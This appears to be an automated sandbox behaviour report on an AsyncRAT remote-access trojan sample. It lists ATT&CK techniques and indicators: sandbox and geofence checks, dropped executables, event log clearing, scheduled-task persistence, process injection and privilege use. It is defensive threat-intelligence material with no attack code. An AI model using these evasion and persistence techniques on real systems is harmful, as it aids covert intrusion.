asyncrat | 1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	$77svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	WinUpdate.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe

Executes dropped EXE 6 IoCs

pid	Process
536	Install.exe
2128	$77svchost.exe
4704	pwtleb.exe
6040	uehcxd.exe
3352	xkpenf.exe
5616	TypeId.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe

Loads dropped DLL 1 IoCs

pid	Process
2028	WinUpdate.exe

Drops file in System32 directory 12 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Tasks\WinUpdate	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\wjanikcjaqy	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\$77svc64	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\WaitHandle\TypeId	svchost.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 704 set thread context of 1436	704	powershell.EXE	90
PID 648 set thread context of 5384	648	powershell.EXE	118
PID 5616 set thread context of 2856	5616	TypeId.exe	120

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 16 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	uehcxd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WinUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	$77svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xkpenf.exe

Checks SCSI registry key(s) 3 TTPs 18 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	wmiprvse.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2556	timeout.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={9B16F413-FD72-4FB8-835D-B1FAA2D5CB52}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1722871257"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Mon, 05 Aug 2024 15:20:58 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	svchost.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
3708	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
704	powershell.EXE
704	powershell.EXE
704	powershell.EXE
1436	dllhost.exe
1436	dllhost.exe
1436	dllhost.exe
1436	dllhost.exe
1436	dllhost.exe
1436	dllhost.exe
1436	dllhost.exe
1436	dllhost.exe
1436	dllhost.exe
1436	dllhost.exe
1436	dllhost.exe
1436	dllhost.exe
1436	dllhost.exe
1436	dllhost.exe
1436	dllhost.exe
1436	dllhost.exe
1436	dllhost.exe
1436	dllhost.exe
1436	dllhost.exe
1436	dllhost.exe
1436	dllhost.exe
1436	dllhost.exe
1436	dllhost.exe
1436	dllhost.exe
1436	dllhost.exe
1436	dllhost.exe
1436	dllhost.exe
1436	dllhost.exe
1436	dllhost.exe
1436	dllhost.exe
1436	dllhost.exe
1436	dllhost.exe
1436	dllhost.exe
1436	dllhost.exe
1436	dllhost.exe
1436	dllhost.exe
1436	dllhost.exe
1436	dllhost.exe
2128	$77svchost.exe
2128	$77svchost.exe
2128	$77svchost.exe
2128	$77svchost.exe
2128	$77svchost.exe
2128	$77svchost.exe
2128	$77svchost.exe
2128	$77svchost.exe
2128	$77svchost.exe
2128	$77svchost.exe
2128	$77svchost.exe
2128	$77svchost.exe
2128	$77svchost.exe
2128	$77svchost.exe
2128	$77svchost.exe
2128	$77svchost.exe
2128	$77svchost.exe
2128	$77svchost.exe
2128	$77svchost.exe
2128	$77svchost.exe
2128	$77svchost.exe
1436	dllhost.exe
1436	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	704	powershell.EXE
Token: SeDebugPrivilege	704	powershell.EXE
Token: SeDebugPrivilege	1436	dllhost.exe
Token: SeDebugPrivilege	2128	$77svchost.exe
Token: SeShutdownPrivilege	3460	Explorer.EXE
Token: SeCreatePagefilePrivilege	3460	Explorer.EXE
Token: SeShutdownPrivilege	484	dwm.exe
Token: SeCreatePagefilePrivilege	484	dwm.exe
Token: SeDebugPrivilege	2028	WinUpdate.exe
Token: SeAssignPrimaryTokenPrivilege	2344	svchost.exe
Token: SeIncreaseQuotaPrivilege	2344	svchost.exe
Token: SeSecurityPrivilege	2344	svchost.exe
Token: SeTakeOwnershipPrivilege	2344	svchost.exe
Token: SeLoadDriverPrivilege	2344	svchost.exe
Token: SeSystemtimePrivilege	2344	svchost.exe
Token: SeBackupPrivilege	2344	svchost.exe
Token: SeRestorePrivilege	2344	svchost.exe
Token: SeShutdownPrivilege	2344	svchost.exe
Token: SeSystemEnvironmentPrivilege	2344	svchost.exe
Token: SeUndockPrivilege	2344	svchost.exe
Token: SeManageVolumePrivilege	2344	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2344	svchost.exe
Token: SeIncreaseQuotaPrivilege	2344	svchost.exe
Token: SeSecurityPrivilege	2344	svchost.exe
Token: SeTakeOwnershipPrivilege	2344	svchost.exe
Token: SeLoadDriverPrivilege	2344	svchost.exe
Token: SeSystemtimePrivilege	2344	svchost.exe
Token: SeBackupPrivilege	2344	svchost.exe
Token: SeRestorePrivilege	2344	svchost.exe
Token: SeShutdownPrivilege	2344	svchost.exe
Token: SeSystemEnvironmentPrivilege	2344	svchost.exe
Token: SeUndockPrivilege	2344	svchost.exe
Token: SeManageVolumePrivilege	2344	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2344	svchost.exe
Token: SeIncreaseQuotaPrivilege	2344	svchost.exe
Token: SeSecurityPrivilege	2344	svchost.exe
Token: SeTakeOwnershipPrivilege	2344	svchost.exe
Token: SeLoadDriverPrivilege	2344	svchost.exe
Token: SeSystemtimePrivilege	2344	svchost.exe
Token: SeBackupPrivilege	2344	svchost.exe
Token: SeRestorePrivilege	2344	svchost.exe
Token: SeShutdownPrivilege	2344	svchost.exe
Token: SeSystemEnvironmentPrivilege	2344	svchost.exe
Token: SeUndockPrivilege	2344	svchost.exe
Token: SeManageVolumePrivilege	2344	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2344	svchost.exe
Token: SeIncreaseQuotaPrivilege	2344	svchost.exe
Token: SeSecurityPrivilege	2344	svchost.exe
Token: SeTakeOwnershipPrivilege	2344	svchost.exe
Token: SeLoadDriverPrivilege	2344	svchost.exe
Token: SeSystemtimePrivilege	2344	svchost.exe
Token: SeBackupPrivilege	2344	svchost.exe
Token: SeRestorePrivilege	2344	svchost.exe
Token: SeShutdownPrivilege	2344	svchost.exe
Token: SeSystemEnvironmentPrivilege	2344	svchost.exe
Token: SeUndockPrivilege	2344	svchost.exe
Token: SeManageVolumePrivilege	2344	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2344	svchost.exe
Token: SeIncreaseQuotaPrivilege	2344	svchost.exe
Token: SeSecurityPrivilege	2344	svchost.exe
Token: SeTakeOwnershipPrivilege	2344	svchost.exe
Token: SeLoadDriverPrivilege	2344	svchost.exe
Token: SeSystemtimePrivilege	2344	svchost.exe
Token: SeBackupPrivilege	2344	svchost.exe

Suspicious use of UnmapMainImage 2 IoCs

pid	Process
4020	RuntimeBroker.exe
3460	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3688 wrote to memory of 536	3688	1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe	86
PID 3688 wrote to memory of 536	3688	1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe	86
PID 3688 wrote to memory of 536	3688	1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe	86
PID 3688 wrote to memory of 2128	3688	1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe	87
PID 3688 wrote to memory of 2128	3688	1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe	87
PID 3688 wrote to memory of 2128	3688	1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db.exe	87
PID 704 wrote to memory of 1436	704	powershell.EXE	90
PID 704 wrote to memory of 1436	704	powershell.EXE	90
PID 704 wrote to memory of 1436	704	powershell.EXE	90
PID 704 wrote to memory of 1436	704	powershell.EXE	90
PID 704 wrote to memory of 1436	704	powershell.EXE	90
PID 704 wrote to memory of 1436	704	powershell.EXE	90
PID 704 wrote to memory of 1436	704	powershell.EXE	90
PID 704 wrote to memory of 1436	704	powershell.EXE	90
PID 1436 wrote to memory of 640	1436	dllhost.exe	5
PID 1436 wrote to memory of 692	1436	dllhost.exe	7
PID 1436 wrote to memory of 980	1436	dllhost.exe	12
PID 1436 wrote to memory of 484	1436	dllhost.exe	13
PID 1436 wrote to memory of 464	1436	dllhost.exe	14
PID 1436 wrote to memory of 864	1436	dllhost.exe	15
PID 1436 wrote to memory of 1032	1436	dllhost.exe	16
PID 1436 wrote to memory of 1048	1436	dllhost.exe	17
PID 1436 wrote to memory of 1164	1436	dllhost.exe	19
PID 1436 wrote to memory of 1216	1436	dllhost.exe	20
PID 1436 wrote to memory of 1240	1436	dllhost.exe	21
PID 1436 wrote to memory of 1356	1436	dllhost.exe	22
PID 1436 wrote to memory of 1404	1436	dllhost.exe	23
PID 1436 wrote to memory of 1412	1436	dllhost.exe	24
PID 1436 wrote to memory of 1428	1436	dllhost.exe	25
PID 1436 wrote to memory of 1468	1436	dllhost.exe	26
PID 1436 wrote to memory of 1492	1436	dllhost.exe	27
PID 1436 wrote to memory of 1584	1436	dllhost.exe	28
PID 1436 wrote to memory of 1680	1436	dllhost.exe	29
PID 1436 wrote to memory of 1696	1436	dllhost.exe	30
PID 1436 wrote to memory of 1792	1436	dllhost.exe	31
PID 1436 wrote to memory of 1836	1436	dllhost.exe	32
PID 1436 wrote to memory of 1856	1436	dllhost.exe	33
PID 1436 wrote to memory of 1868	1436	dllhost.exe	34
PID 1436 wrote to memory of 1940	1436	dllhost.exe	35
PID 1436 wrote to memory of 1988	1436	dllhost.exe	36
PID 1436 wrote to memory of 1708	1436	dllhost.exe	37
PID 1436 wrote to memory of 2088	1436	dllhost.exe	39
PID 1436 wrote to memory of 2208	1436	dllhost.exe	40
PID 1436 wrote to memory of 2344	1436	dllhost.exe	41
PID 1436 wrote to memory of 2432	1436	dllhost.exe	42
PID 1436 wrote to memory of 2440	1436	dllhost.exe	43
PID 1436 wrote to memory of 2548	1436	dllhost.exe	44
PID 1436 wrote to memory of 2576	1436	dllhost.exe	45
PID 1436 wrote to memory of 2596	1436	dllhost.exe	46
PID 1436 wrote to memory of 2708	1436	dllhost.exe	47
PID 1436 wrote to memory of 2724	1436	dllhost.exe	48
PID 1436 wrote to memory of 2740	1436	dllhost.exe	49
PID 1436 wrote to memory of 2768	1436	dllhost.exe	50
PID 1436 wrote to memory of 2828	1436	dllhost.exe	51
PID 1436 wrote to memory of 3048	1436	dllhost.exe	52
PID 1436 wrote to memory of 2924	1436	dllhost.exe	53
PID 1436 wrote to memory of 3412	1436	dllhost.exe	55
PID 1436 wrote to memory of 3460	1436	dllhost.exe	56
PID 1436 wrote to memory of 3616	1436	dllhost.exe	57
PID 1436 wrote to memory of 3836	1436	dllhost.exe	58
PID 1436 wrote to memory of 4020	1436	dllhost.exe	60
PID 1436 wrote to memory of 4236	1436	dllhost.exe	62
PID 1436 wrote to memory of 4872	1436	dllhost.exe	65
PID 1436 wrote to memory of 4908	1436	dllhost.exe	67

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:640
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:484
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{64217033-ae07-42a7-8a2b-48aee1d88a5d}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1436
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{08f909cf-5a59-4dfc-b93f-5ae46990d703}
  2⤵
  PID:5384

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:980

